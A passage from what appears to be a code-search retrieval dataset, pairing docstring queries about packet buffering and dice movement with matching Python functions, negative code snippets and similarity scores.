bytes, proto: int, payload: bytes) -> bytes:\n _sum = dpkt.struct.pack(\">4s4sxBH\", src, dst, proto, len(payload))\n _sum = dpkt.in_cksum_add(0, _sum)\n _sum = dpkt.in_cksum_add(_sum, payload)\n _sum = dpkt.in_cksum_done(_sum)\n return _sum" ]
[ "0.7895792", "0.661901", "0.63492525", "0.6196242", "0.6103663", "0.6019841", "0.5995078", "0.5981094", "0.59252846", "0.5890868", "0.58816797", "0.58208543", "0.5804756", "0.5796329", "0.5782937", "0.5778316", "0.574992", "0.568126", "0.56439674", "0.5617276", "0.5610319", "0.55850554", "0.5582861", "0.5580631", "0.55682504", "0.55460334", "0.55448467", "0.5512302", "0.54815364", "0.54712826" ]
0.72170126
1
Iterates over next packets in the buffer and removes them
def remove_buffered_packets(self): seq = self.next_seq while True: p = self.buffer.pop(seq, None) if p is None: break else: seq += len(p.data) yield p
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def drop_packets(self, verbose=False):\n while True:\n try:\n packet, address = self._socket.recvfrom(10240)\n except:\n break\n\n if verbose:\n logger.debug(\"dropped %d bytes from %s:%d\", len(packet), address[0], address[1])", "def delete_packets(self, num):\n for i in range(num):\n del self._packets[0]", "def _check_buffer(self):\n count = 0\n for packet in self.remove_buffered_packets():\n self._append_packet(packet)\n count += 1\n\n if count > 0:\n logging.debug('Removed %i items from the buffer, %i left.' % (count, len(self.buffer)))", "def port_buffer_drop():", "def resend_buffer_packets():\n global BUFFER\n for seq in BUFFER.keys():\n packet_info = BUFFER[seq]\n msg_obj = packet_info.msg\n new_start = time.time()\n handle_packet_send(msg_obj)\n new_packet_info = PacketInfo(msg_obj, new_start)\n # Update the packet in the buffer with the new time sent at\n BUFFER[seq] = new_packet_info", "def cleanse(packets):\n pkts = []\n retran = False\n lost = False\n for pkt in packets:\n if len(pkt['data']) > 0:\n # If first packet just add and move on\n if len(pkts) == 0:\n pkts.append(pkt)\n next_seq = pkt['tcp']['seq_num'] + len(pkt['data'])\n # If next seq num is = to this one add this pkt\n elif pkt['tcp']['seq_num'] == next_seq:\n pkts.append(pkt)\n next_seq = pkt['tcp']['seq_num'] + len(pkt['data'])\n # If next seq num is > than this one there is a \n # Retransmission\n elif pkt['tcp']['seq_num'] < next_seq:\n retran = True\n elif pkt['tcp']['seq_num'] > next_seq:\n lost = True\n else:\n pass\n\n return pkts, retran, lost", "def _pop_received_packet(self):\n fragments = self._receive_heap.pop_min_and_all_fragments()\n if fragments is None:\n self._attempt_disabling_looping_receive()\n else:\n last_seqnum = fragments[-1].sequence_number\n self._update_next_expected_seqnum(last_seqnum)\n self._update_next_delivered_seqnum(last_seqnum)\n payload = b''.join(f.payload for f in fragments)\n self.handler.receive_message(payload)\n\n if self._next_delivered_seqnum not in self._receive_heap:\n self._attempt_disabling_looping_receive()", "def run(self):\r\n waiting_packet = None\r\n while True:\r\n if waiting_packet is not None:\r\n packet = waiting_packet\r\n waiting_packet = None\r\n else:\r\n packet = yield self.buffer.get()\r\n self.channel.add_sender(self)\r\n yield self.env.timeout(packet.size/self.service_rate)\r\n self.channel.remove_sender(self)\r\n packet.output_timestamp= env.now\r\n if self.destination is None:\r\n self.packet_list.append(packet)\r\n if (not self.collision):\r\n if self.destination is not None:\r\n self.destination.put(packet)\r\n self.channel.packet_list.append(packet)\r\n else:\r\n if self.debug:\r\n print(\"Packet %d is discarded. Reason: Collision\" \r\n % (packet.id))\r\n self.packets_drop += 1\r\n waiting_packet = packet\r\n self.collision = False\r\n yield self.env.timeout(self.random_delay())", "def _convert_packets_into_batch(self, packets):\n def filter_non_bootstrap_nodes():\n for candidate, packet in packets:\n cid = packet[2:22]\n\n if not cid in self._communities and False: # candidate.sock_addr[0] in self._non_autoload:\n if __debug__:\n logger.warn(\"drop a %d byte packet (received from non-autoload node) from %s\", len(packet), candidate)\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:from bootstrap node for unloaded community\")\n continue\n\n yield candidate, packet\n\n packets = list(filter_non_bootstrap_nodes())\n if packets:\n return super(TrackerDispersy, self)._convert_packets_into_batch(packets)\n\n else:\n return []", "def _discard_excess_bytes(self):\n discard_len = min(self._discard, len(self._buffer))\n del self._buffer[:discard_len]\n self._discard -= discard_len", "def filter(self):\n # outfile = open(self.newpcap, 'wb')\n # writer = dpkt.pcap.Writer(outfile)\n f = open(self.pcapfile, 'rb')\n packets = dpkt.pcap.Reader(f)\n\n for timestamp, buf in packets:\n eth = dpkt.ethernet.Ethernet(buf)\n if not isinstance(eth.data, dpkt.ip.IP): # 确保以太网数据包含一个IP数据包, Non IP Packet type not supported\n continue # 过滤空IP包\n ip = eth.data # 获取以太网帧(IP数据包)\n if not isinstance(ip.data, dpkt.tcp.TCP): # 在传输层中检查TCP\n continue\n tcp = ip.data # 获取tcp数据\n # print('-->TCP Data: ', repr(tcp))\n\n \"\"\" 过滤三次握手后的首包\"\"\"\n seq = self.seq_pattern.findall(repr(tcp))\n ack = self.ack_pattern.findall(repr(tcp))\n if not (seq or ack): # seq、ack必须有一个, 一真即真\n continue\n if ack:\n ack = ack[0]\n if seq:\n seq = seq[0]\n\n if not ack and seq: # 一次握手请求\n self.hash_table[seq] = {}\n self.stream_table[seq] = [buf]\n if ack and seq: # 二次、三次、交流包\n if str(int(ack) - 1) in self.hash_table.keys(): # 有一次握手记录\n number = str(int(ack) - 1)\n if 'second' not in self.hash_table[number].keys(): # 新增二次握手\n self.hash_table[number]['second'] = {'seq': seq, 'ack': ack}\n self.stream_table[number].append(buf) # 将二次握手添加到buf\n self.resp_relation[seq] = ack # 新增关系表\n\n # 存在二次握手记录, 看hash表有无第三次握手记录, 有就保存stream流\n # 基本就是traffic响应包了\n elif 'three' in self.hash_table[number].keys():\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n\n # ack-1没有对应的hash表, 可能是三次握手或traffic请求包\n elif str(int(seq) - 1) in self.hash_table.keys():\n number = str(int(seq) - 1)\n if 'second' not in self.hash_table[number]:\n pass\n elif 'three' not in self.hash_table[number]: # 三次包\n self.hash_table[number]['three'] = {'seq': seq, 'ack': ack}\n self.stream_table[number].append(buf)\n # 否则就是traffic包了\n else:\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n # traffic响应包\n elif str(int(seq) - 1) in self.resp_relation.keys():\n number = str(int(seq) - 1)\n second_ack = self.resp_relation[number]\n number = str(int(second_ack) - 1)\n if number not in self.stream_table.keys():\n self.stream_table[number] = []\n self.stream_table[number].append(buf)\n else:\n self.stream_table[number].append(buf)\n else:\n continue # seq不存在\n\n # outfile.close()\n f.close()", "def get_next_output_packet(self):\n if self.num_packets != 0:\n return self.packet_buffer.pop(0)", "def _convert_packets_into_batch(self, packets):\n assert isinstance(packets, (tuple, list))\n assert len(packets) > 0\n assert all(isinstance(packet, tuple) for packet in packets)\n assert all(len(packet) == 2 for packet in packets)\n assert all(isinstance(packet[0], Candidate) for packet in packets)\n assert all(isinstance(packet[1], str) for packet in packets)\n\n for candidate, packet in packets:\n # find associated community\n try:\n community = self.get_community(packet[2:22])\n except KeyError:\n if __debug__:\n dprint(\"drop a \", len(packet), \" byte packet (received packet for unknown community) from \", candidate, level=\"warning\")\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:unknown community\")\n self._statistics.drop_count += 1\n continue\n\n # find associated conversion\n try:\n conversion = community.get_conversion(packet[:22])\n except KeyError:\n if __debug__:\n dprint(\"drop a \", len(packet), \" byte packet (received packet for unknown conversion) from \", candidate, level=\"warning\")\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:unknown conversion\")\n self._statistics.drop_count += 1\n continue\n\n try:\n # convert binary data into the meta message\n yield conversion.decode_meta_message(packet), candidate, packet, conversion\n\n except DropPacket, exception:\n if __debug__:\n dprint(\"drop a \", len(packet), \" byte packet (\", exception,\") from \", candidate, level=\"warning\")\n self._statistics.dict_inc(self._statistics.drop, \"_convert_packets_into_batch:decode_meta_message:%s\" % exception)\n self._statistics.drop_count += 1", "def purce_all_dropped_messages(self) -> None:\n for mrec in _utils.getsome(self.droppedmsgs.pop):\n self.msgmap.remove_instance(mrec.id, mrec) # O(log(n))", "def send_packet(self):\n amountfreed = 0\n bitstransmitted = 0\n # If we are at or have passed the time at which we should send the next\n # packet, we should try to send the next packet.\n if (self.next_packet_send_time <= globals.systime):\n # If there is nothing currently in the buffer, we have nothing to\n # send at this time.\n if (len(self.buffer) == 0):\n self.next_packet_send_time = \\\n self.next_packet_send_time + globals.dt\n\n # Otherwise, It's time to send the packet at the front of the buffer\n else:\n packet_to_send = self.buffer.pop(0)\n amountfreed = packet_to_send.get_size()\n # Updates buffersize to reflect that we removed the packet\n # at the front of the buffer from the buffer.\n self.buffersize = self.buffersize - amountfreed\n\n # Time represents the amount of time in the previous dt that we\n # were transmitting. (i.e. between the previous systime and the\n # current)\n time = self.next_packet_send_time - (globals.systime - globals.dt)\n # bitstransmitted represents the number of bits that were\n # transmitted in the previous dt\n bitstransmitted = time * self.rate\n\n # Now we need to add the packet that we removed from the\n # buffer to the lists that keep track of the propegation of the\n # packets.\n self.packets_in_transmission.append(packet_to_send)\n self.packet_arrival_times.append(self.next_packet_send_time + self.delay)\n\n # If there are still packets in the buffer, update the time\n # to send the next packet to be when it would finish transmitting\n if (len(self.buffer) > 0):\n next_packet_size = self.buffer[0].get_size()\n self.next_packet_send_time = self.next_packet_send_time + \\\n next_packet_size * (1/self.rate)\n # If we finished transmitting a packet and immediately\n # started sending another, we transmitted the entire time\n # step.\n bitstransmitted = globals.dt * self.rate\n\n # the buffer is empty so we will just set the time to try to\n # send the next packet to be the next time step.\n else:\n self.next_packet_send_time = self.next_packet_send_time + \\\n globals.dt\n\n # in one of two cases: either buffer is empty or we used link to capacity\n # in last dt.\n else:\n # if the buffer is nonempty, we must have been transmitting for\n # the entire duration of the last timestep.\n if (len(self.buffer) != 0):\n bitstransmitted = globals.dt * self.rate\n else:\n pass\n\n # Now, we compute and update the effective rate of the link.\n rate = 0\n self.lrsteps.append(bitstransmitted)\n if(globals.systime <= self.lrwindow):\n if (globals.systime != 0):\n rate = sum(self.lrsteps)/(globals.systime + globals.dt)\n # when the time is 0, we will just set the rate to be 0.\n else:\n pass\n else:\n self.lrsteps.pop(0)\n rate = sum(self.lrsteps)/self.lrwindow\n self.effectiverate = rate\n\n # If we are tracking this HalfLink, we will also record its current\n # rate.\n if (self.track):\n key = self.id + \":\" + self.source + \"->\" + self.destination + \":\" \\\n + globals.LINKRATE\n dict = globals.statistics[key][globals.systime] = rate\n\n # Now we will check if any packets should be arriving at their\n # destination.\n if (len(self.packet_arrival_times) > 0):\n # If the time has passed the arrival time at the front of the list\n # of packet_arrival_times, we should remove the first item of the\n # list of packet_arrival_times, as well as the corresponding first\n # element of the list of packets_in_transmission and we should send\n # that packet to its destination.\n if (self.packet_arrival_times[0] <= globals.systime):\n packet_to_send = self.packets_in_transmission.pop(0)\n self.packet_arrival_times.pop(0)\n dest_type = ''\n if self.destination[0] == 'H':\n dest_type = 'hosts'\n else:\n dest_type = 'routers'\n receiver = globals.idmapping[dest_type][self.destination]\n receiver.receive_packet(packet_to_send, self.id)\n return amountfreed", "def remove_discarded(self):\n while self.shrink_target.has_discards:\n discarded = []\n\n for ex in self.shrink_target.examples:\n if ex.discarded and (not discarded or ex.start >= discarded[-1][-1]):\n discarded.append((ex.start, ex.end))\n\n assert discarded\n\n attempt = bytearray(self.shrink_target.buffer)\n for u, v in reversed(discarded):\n del attempt[u:v]\n\n if not self.incorporate_new_buffer(attempt):\n break", "def delcomptcptxpackets(self) :\n\t\ttry :\n\t\t\treturn self._delcomptcptxpackets\n\t\texcept Exception as e:\n\t\t\traise e", "def _prune(self):\n while len(self.data) > self.limit:\n self.data.popleft()", "def emptyBuffer(self):\n msg = True\n while msg:\n msg = self.receive()", "def _popN(self, n):\n for _ in range(n):\n self._buffer.popleft()", "def _leftovers(self, fl):\n try:\n data = self.sock.recv(1024, fl)\n except socket.error as _:\n return False\n if len(data) != 0:\n tail = data\n while True:\n (head, tail) = Ctrl().split_combined(tail)\n print(\"Got message:\", Ctrl().rem_header(head))\n if len(tail) == 0:\n break\n return True\n return False", "def parseBuffer(self):\n idx = self.buf.find(DELIMITER)\n while idx > -1:\n packet = self.buf[0:idx]\n if len(packet) > 4:\n if packet[0:3] == 'DATA':\n self.factory.setData(packet[4:idx])\n else:\n print \"%s is a malformed packet, header %s not recognized\" % (packet, packet[0:3])\n else:\n print \"%s attempting to send a packet of invalid length %s\" % (packet, len(packet))\n self.buf = self.buf[(idx + len(DELIMITER)):]\n idx = self.buf.find(DELIMITER)", "def delcomptcprxpackets(self) :\n\t\ttry :\n\t\t\treturn self._delcomptcprxpackets\n\t\texcept Exception as e:\n\t\t\traise e", "def _discard_until_message_start(buffer):\n discarded_bytes = bytearray()\n\n for index, c in enumerate(buffer):\n if c not in {MESSAGE_START_BYTE, MESSAGE_FAILURE_BYTE}:\n discarded_bytes.append(c)\n else:\n break\n\n if discarded_bytes:\n buffer[:len(discarded_bytes)] = []\n discarded_bytes = discarded_bytes.lstrip(b'\\x00')\n\n if discarded_bytes:\n logger.warning(\n \"Discarding %s unexpected byte(s): %s\",\n len(discarded_bytes),\n discarded_bytes.hex(),\n )", "def decomptcptxpackets(self) :\n\t\ttry :\n\t\t\treturn self._decomptcptxpackets\n\t\texcept Exception as e:\n\t\t\traise e", "def iter_packets(iterable):\n prev = None\n\n for i in sorted(iterable, key=attrgetter('seq')):\n if prev is None or prev.seq != i.seq:\n prev = i\n yield i", "def deQueue(self):\n if self.isEmpty():\n return False\n self.__start = (self.__start+1) % len(self.__buffer)\n self.__size -= 1\n return True", "def send_from_buffer(decoded_seq, lowest_seq):\n if decoded_seq == lowest_seq:\n log(f'removing {lowest_seq} from buffer')\n # Remove the ack-ed sequence from the buffer and get the stored value\n acked_packet = BUFFER.pop(lowest_seq)\n rtt_start = acked_packet.rtt_start\n calculate_rtt(rtt_start, rtt_stop)\n # Try to send next packet\n sent_packet = send_next_packet()\n if sent_packet:\n BUFFER[SEQUENCE] = sent_packet\n return True\n else:\n # No more packets to send. Wait for other acks\n log('packet not sent')\n return False", "def _read_packets(self, cur_time):\n if not isinstance(self._packets, list):\n self._set_last_time(cur_time + self._read_time)\n else:\n self._set_last_time(cur_time + len(self._packets) * self._read_time)\n self.delete_packets(len(self._packets))", "def pop_from_deque(self):" ]
[ "0.67283076", "0.66058624", "0.63236773", "0.6317739", "0.6310936", "0.62291014", "0.61791795", "0.60786915", "0.60678726", "0.59578645", "0.5947683", "0.5928341", "0.5889969", "0.5796768", "0.5776283", "0.5721672", "0.571722", "0.57118416", "0.5706474", "0.5685877", "0.5665577", "0.56438065", "0.56415844", "0.5609237", "0.5579427", "0.55651146", "0.5552176", "0.55493534", "0.5535785", "0.5502268" ]
0.7841867
0
Move a die through a list of positions.
def move(self, *positions, show_length=True) -> str: move_parts = [] move_count = len(positions) pips = prev_x = prev_y = 0 for i, (x, y) in enumerate(positions): if i == 0: pips = self.dice.pop((x, y)) else: dx = x - prev_x dy = y - prev_y if 0 < dx: move_part = f'R{dx}' elif dx < 0: move_part = f'L{-dx}' elif 0 < dy: move_part = f'U{dy}' else: move_part = f'D{-dy}' if not show_length: move_part = move_part[0] if i == 1: move_part = f'{pips}{move_part}' if i == move_count - 1: self.dice[x, y] = pips move_parts.append(move_part) prev_x = x prev_y = y return ''.join(move_parts)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def throw(self, move):\n for dice_index in move:\n self.dice[dice_index - 1] = random.randint(1,6)", "def move_tie_fighters(self):\n for i in range(len(self.tie_fighters)):\n self.tie_fighters[i].move_tie_fighter()", "def migration(self):\n\n coordinates = self.get_random_coordinates()\n for coordinate in coordinates:\n if isinstance(self.cells[coordinate], (Jungle, Savannah, Desert)):\n self.cell_move_herbivores(coordinate)\n self.cell_move_carnivores(coordinate)\n\n for coordinate in coordinates:\n if isinstance(self.cells[coordinate], (Jungle, Savannah, Desert)):\n self.cells[coordinate].move_new_animals()", "def move(self, direction, cycles):\n\t\tpass", "def move(self, direction: str) -> int:\n (i, j), _ = self.position.popitem(last=True) # current position\n self.position[(i, j)] = 0 # add back \n if direction == \"U\": i -= 1\n elif direction == \"L\": j -= 1\n elif direction == \"R\": j += 1\n else: i += 1\n if self.food and self.food[0] == [i, j]: self.food.popleft()\n else: self.position.popitem(last=False)\n if not (0 <= i < self.height and 0 <= j < self.width) or (i, j) in self.position: return -1 # game over \n self.position[(i, j)] = 0\n return len(self.position)-1", "def roll_the_dice(self, dice):\n if type(dice) == list:\n for die in dice:\n die.roll()", "def move(self):\n for agent in self.agents:\n if not agent.fidelity:\n options = agent.get_move_options(agent.hex, self.kernel_size, None, extend=True)\n target = random36.choices(population=options,weights=[x.quality**2 for x in options])\n agent.move(target[0])", "def one_player_leg(length, pos):\n throw = dice()\n moves = []\n while throw == 6:\n if pos + throw < length:\n pos += throw\n moves.append(throw)\n elif pos + throw == length:\n pos += throw\n moves.append(throw)\n return pos, moves\n else:\n moves.append(throw)\n throw = dice()\n else:\n if pos + throw < length:\n pos += throw\n moves.append(throw)\n elif pos + throw == length:\n pos += throw\n moves.append(throw)\n return pos, moves\n else:\n moves.append(throw)\n return pos, moves", "def roll_dices(self):\n dice1 = random.randint(1, 6)\n dice2 = random.randint(1, 6)\n\n self.client.send_player_end_dices()\n self.game.player_rolled_dices([dice1, dice2])\n asyncio.ensure_future(self.move(dice1 + dice2))", "def test_move():\n human = Human()\n coordinates = [2, 1]\n dimensions = [3, 4]\n\n new_coordinates = human.move(coordinates, dimensions)\n\n possible_new_coordinates = [[2, 0], [3, 0], [3, 1], [3, 2], [2, 2], [1, 2], [1, 1], [1, 0]]\n\n assert new_coordinates in possible_new_coordinates", "def move(self, direction):\n head = self.snake[0]\n delta = self.dirs[direction]\n nextMove = [head[0] + delta[0], head[1] + delta[1]]\n if not self.isValidMove(nextMove):\n return -1\n\n if self.food and nextMove == self.food[0]:\n self.food.popleft()\n else:\n self.snake.pop()\n\n self.snake.appendleft(nextMove)\n\n return len(self.snake) - 1", "def move(self, direction=0):\n moves = [\n [3, 1],\n [2, 2],\n [1, 3],\n [0, 0]\n ]\n\n self._rotate(moves[direction][0])\n\n for row in range(4):\n r = [i for i in self.map[row] if i != 0]\n\n r_result = []\n while(len(r)):\n num = r.pop(0)\n if len(r) and num == r[0]:\n num += r.pop(0)\n # TODO: Do a 2048 check here to see if the player won?\n # this might not be the best place because we could use\n # this method to run tests to see if the player has any valid moves\n r_result.append(num)\n \n self.map[row] = r_result + [0]*(4-len(r_result))\n\n self._add_random_piece()\n\n self._rotate(moves[direction][1])\n self.print_map()", "def eat(bots, food_list):\n \n # iterates through bot positions\n for bot in bots:\n # iterates through food positions\n for food_loc in food_list:\n # compare bot and food positions\n first_pos = bot.position[0] == food_loc[0]\n second_pos = bot.position[1] == food_loc[1]\n \n # if food and bot in same spot, food is removed\n if first_pos and second_pos:\n food_list.remove(food_loc)", "def move(self, coordinates, direction):\n pass", "def move(t, length):\n pu(t)\n\t\n fd(t, length)\n pd(t)", "def move(exits, direction):\r\n return rooms[exits[direction]]", "def actions_turn(positions, player1, player2, creatures):\n\n attacking = []\n moving = []\n\n # Split the orders within attacks and movements\n for character in positions:\n if character in creatures:\n if positions[character]['order'] == 'attack':\n attacking += character\n else:\n moving += character\n elif character in player1:\n if positions[character]['order'] == 'attack':\n attacking += character\n else:\n moving += character\n\n else:\n if positions[character]['order'] == 'attack':\n attacking += character\n else:\n moving += character\n\n # Execute the attacks\n for character in attacking:\n # First attacking : the creatures\n if character in creatures:\n hero_name = character\n name_attack = positions[character]['name_attack']\n attack_coord = positions[character]['where']\n attack(positions, hero_name, name_attack, (0, 0), attack_coord, player1, player2, creatures)\n # Then the heroes of the first player\n elif character in player1:\n hero_name = character\n name_attack = positions[character]['name_attack']\n attack_coord = positions[character]['where']\n attack(positions, hero_name, name_attack, (0, 0), attack_coord, player1, player2, creatures)\n # Finally the ones of the second player\n else:\n hero_name = character\n name_attack = positions[character]['name_attack']\n attack_coord = positions[character]['where']\n attack(positions, hero_name, name_attack, (0, 0), attack_coord, player1, player2, creatures)\n\n for character in moving:\n print(character, moving)\n # First moving : the creatures\n if character in creatures:\n hero_name = character\n movement_coord = positions[character]['where']\n move(hero_name, positions, movement_coord)\n\n # Then the heroes of the first player\n elif character in player1:\n hero_name = character\n movement_coord = positions[character]['where']\n move(hero_name, positions, movement_coord)\n\n # Finally the ones of the second player\n else:\n hero_name = character\n movement_coord = positions[character]['where']\n move(hero_name, positions, movement_coord)\n\n return player1, player2, positions, creatures", "def move(self):\n if self.adjustment > 0:\n # The player moves up a ladder\n old_position = self.position\n # In the next move, player on top of ladder\n\n self.position = old_position - self.dropped_steps\n # player drops steps\n super().move()\n # player move\n die = self.position - old_position + self.dropped_steps - \\\n self.adjustment\n \"\"\" \n the current position of the player is: old position - \n dropped_steps + die + adjustment. Rearranging to find the die.\n \n \"\"\"\n if die < self.dropped_steps:\n self.position = old_position\n # if die is less than dropped_steps, the player will stand still.\n else:\n super().move()\n # if not climbling a ladder, then the player make a regular move", "def temp_swap_dice(self, move, new_faces):\n assert len(move) == len(new_faces)\n output = list(self.dice)\n for face in move:\n output.remove(face)\n for face in new_faces:\n output.append(face)\n return tuple(sorted(output))", "def find_moveable_pieces(self, die, p1): \n moveable = []\n if (p1):\n #must we re-enter?\n if (self.p1vec[0] > 0):\n if (self.free_spot(0, die, p1)):\n b = Board(self.p1vec[:],self.p2vec[:])\n b.move(0, die, p1)\n moveable.append(b)\n #no? ok then generate the moves\n else:\n for i in range(1, 25):\n if (self.p1vec[i] > 0):\n if (self.free_spot(i, die, p1)):\n b = Board(self.p1vec[:],self.p2vec[:])\n b.move(i, die, p1)\n moveable.append(b)\n else:\n #must we re-enter?\n if (self.p2vec[0] > 0):\n if (self.free_spot(0, die, p1)):\n b = Board(self.p1vec[:],self.p2vec[:])\n b.move(0, die, p1)\n moveable.append(b)\n #no? ok then generate the moves\n else:\n for i in range(1, 25):\n if (self.p2vec[i] > 0):\n if (self.free_spot(i, die, p1)):\n b = Board(self.p1vec[:],self.p2vec[:])\n b.move(i, die, p1)\n moveable.append(b)\n return moveable", "def on_die(self, head_position, board, score, body_parts):", "def move(self,move):\n for x in range(len(self.coord)):\n self.coord[x] = np.array([y+np.array(move) for y in self.coord[x]])\n return self", "def DoMove(position, move):\n return position - move", "def move(self, direction):\n # replace with your code\n\n indices = self.direction_indices[direction]\n for coordinate in indices:\n merged_coordinate_list = self.get_list(direction, coordinate)\n self.change_board(merged_coordinate_list, coordinate, direction)\n print(self.__str__())\n if self.board_is_not_full():\n self.new_tile()", "def move(self):\r\n segments = len(self.all_turtles) - 1\r\n for i in range(len(self.all_turtles)):\r\n if segments == 0:\r\n self.all_turtles[segments].forward(MOVE_DISTANCE)\r\n else:\r\n new_x = self.all_turtles[segments - 1].xcor()\r\n new_y = self.all_turtles[segments - 1].ycor()\r\n self.all_turtles[segments].goto(new_x, new_y)\r\n segments -= 1", "def postion_fleet(self, ships_positions, board):\n for cell in ships_positions:\n row = ord(cell[:1]) - ord('A')\n col = int(cell[1:]) - 1\n for i in range(row, row + self.total_rows_req):\n for j in range(col, col + self.total_column_req):\n self.position_ship(\n board.grid[i][j],\n constants.FLEET_P_CLASS,\n constants.P_CLASS_HIT_POWER\n )", "def move(self):\n assert self.is_alive, \"Sprite is dead, and should not be able to move\"\n if self.health > 3:\n self.y += random.randint(-1, 1) # change by -1, 0, 1\n self.x += random.randint(-1, 1) # change by -1, 0, 1\n print(self.name, \"moves to position\", str(self.x), \",\", str(self.y))", "def move_all_animals(self):\n\n y_lim, x_lim = np.shape(self.map)\n for y in range(y_lim):\n for x in range(x_lim):\n loc = y, x\n self.map[loc].migration(self.get_neighbour((y, x)))", "def postion_fleet(self, ships_positions, board):\n for cell in ships_positions:\n row = ord(cell[:1]) - ord('A')\n col = int(cell[1:]) - 1\n for i in range(row, row + self.total_rows_req):\n for j in range(col, col + self.total_column_req):\n self.position_ship(\n board.grid[i][j],\n constants.FLEET_Q_CLASS,\n constants.Q_CLASS_HIT_POWER\n )", "def move(self):\n # neighbor offsets\n offset = [(-1, 1),(0, 1),(1, 1),(-1, 0),(1, 0),(-1, -1),(0, -1),(1, -1)]\n for i in range(len(offset)):\n x = self.x + offset[i][0] # neighboring coordinates\n y = self.y + offset[i][1]\n if self.island.animal(x, y) == 0: # neighboring spot is open\n self.island.remove(self) # remove from current spot\n self.x = x # new coordinates\n self.y = y\n self.island.register(self) # register new coordinates\n break # finished with move" ]
[ "0.66328007", "0.596524", "0.5870962", "0.58515584", "0.5819032", "0.57985187", "0.5759108", "0.57562107", "0.574448", "0.57078034", "0.56926847", "0.56588614", "0.5642412", "0.5605683", "0.5596673", "0.5586302", "0.55856097", "0.5582289", "0.5575625", "0.55608356", "0.55554855", "0.5535301", "0.55272806", "0.55162615", "0.55116314", "0.55028677", "0.5497211", "0.5493248", "0.5492864", "0.549278" ]
0.63560057
1
Record the joint character between a pair of cells.
def add_joint(joint: str, x1: int, y1: int, x2: int, y2: int) -> str: return joint
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def junction_char(self):\n ...", "def _put_chr_at(self, char, row, col, color, adjustment_x=.19, adjustment_y=.19):\n self._goto_piece_xy(row, col, adjustment_x, adjustment_y)\n self.pen.color(color)\n self.pen.write(char, font=(\"Courier\", round(self.square_side_size * .7),\n \"normal\"))", "def encryptPair(self):\n # Locate the characters in the matrix\n self.deselectCanvasses()\n (row1, col1) = self.matrix.find(self.plainText[self.cursor])\n (row2, col2) = self.matrix.find(self.plainText[self.cursor + 1])\n self.selectCanvas(row1, col1, \"gray\")\n self.selectCanvas(row2, col2, \"gray\")\n # Swap them if they are in the same row or column\n if row1 == row2 or col1 == col2:\n return self.plainText[self.cursor + 1] + self.plainText[self.cursor]\n # Otherwise, use the characters at the opposite\n # corners of the rectangle in the matrix\n else:\n self.selectCanvas(row2, col1, \"pink\")\n self.selectCanvas(row1, col2, \"pink\")\n ch1 = self.matrix[row2][col1]\n ch2 = self.matrix[row1][col2]\n return ch1 + ch2", "def _get_letters_adjacent_cells(self, grid, x0, y0):\n letters = ''\n for cell in grid.get_adjacent_cells(x0, y0):\n letters = letters + cell['letter']\n return ''.join(sorted(letters))", "def joint_pairs(self):\n return ((1, 4), (2, 5), (3, 6), (14, 11), (15, 12), (16, 13))", "def en_passant(self, from_row, from_col, to_row, to_col):\n t = self.data[from_row][from_col]\n self.data[from_row][from_col] = '.'\n self.data[to_row][to_col] = t \n self.data[from_row][to_col] = '.'", "def display_board(board: list, character: list):\n for index in range(len(board)):\n for index_two in range(len(board[index])):\n current_position = [index, index_two]\n if current_position == character:\n if index_two == len(board[index]) - 1:\n print('c')\n else:\n print('c', end=\" \")\n else:\n if index_two == len(board[index]) - 1:\n print('x')\n else:\n print('x', end=\" \")", "def createperson(self, board, x_ind, y_ind, char):\n self = self\n for i in range(4):\n for j in range(2):\n board[x_ind + j][y_ind + i] = char\n return board", "def cell_value(self, x, y):\n if x == 8 and y == 0:\n return \"--\"\n (r, g) = self[(x, y)]\n return \"%s%s\" % (r, g)", "def label_joints():\n side_dict = {'C': 0,\n 'L': 1,\n 'R': 2}\n for jnt in mc.ls(type='joint'):\n mc.setAttr('{}.side'.format(jnt), side_dict[jnt.split('_')[0]])\n mc.setAttr('{}.type'.format(jnt), 18)\n mc.setAttr('{}.otherType'.format(jnt), jnt.split('_')[1], type=\"string\")", "def display_position(game_board: list, character: list):\n print(\"You are currently here:\")\n for position in game_board:\n if position[0] == character[0] and position[1] == character[1]:\n print('C', end=\" \")\n else:\n print(\"*\", end=\" \")\n if position[1] == game_board[-1][1]:\n print(\"\")", "def writechar(self, char=\" \"):\n\n font=self.selectfont(char)\n t = self.canvas.beginText(self.x, self.y)\n t.setFont(font, self.fontsize)\n t.setFillGray(self.gray)\n t.textOut(char)\n self.canvas.drawText(t)\n return t", "def dummy_junction24():\n return 'junction:chr1:251-399:+'", "def insertJoint(*args, **kwargs)->AnyStr:\n pass", "def __str__(self) -> str:\n output = self.columns * \" __\" + \"\\n\"\n for i in range(self.rows):\n for j in range(self.columns):\n filling = \"__\"\n if len(self.cells[i][j].agents) == 1:\n filling = \"_§\"\n elif len(self.cells[i][j].agents) == 2:\n filling = \"§§\"\n elif len(self.cells[i][j].agents) > 2:\n filling = \"++\"\n output += \"|\" + filling\n if j == self.columns - 1:\n output += \"|\"\n output += \"\\n\"\n return output", "def dummy_junction23():\n return 'junction:chr1:251-299:+'", "def jointext(firststring, secondstring):\n\n # Return the joined strings\n return str(firststring) + str(secondstring)", "def coord_char(coord, matrix):\n row_index, column_index = coord\n\n return matrix[row_index][column_index]", "def dummy_junction13():\n return 'junction:chr1:176-299:+'", "def simple_cell_string(self, values):\n if len(values) == 0:\n return '!'\n elif len(values) == 1:\n return self.number_strings[values[0]]\n else:\n return '.'", "def encode(self, char):\n\n if char == self.pair[0]:\n return self.pair[1]\n elif char == self.pair[1]:\n return self.pair[0]\n else:\n return char", "def joint_callback(data):\n joints[0] = data.position[9]\n joints[1] = data.position[10]\n joints[2] = data.position[11]\n joints[3] = data.position[12]\n joints[4] = data.position[13]\n global position_geted\n position_geted = True", "def joint_pairs(self):\n return [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16], #17 body keypoints\n [20-3, 23-3], 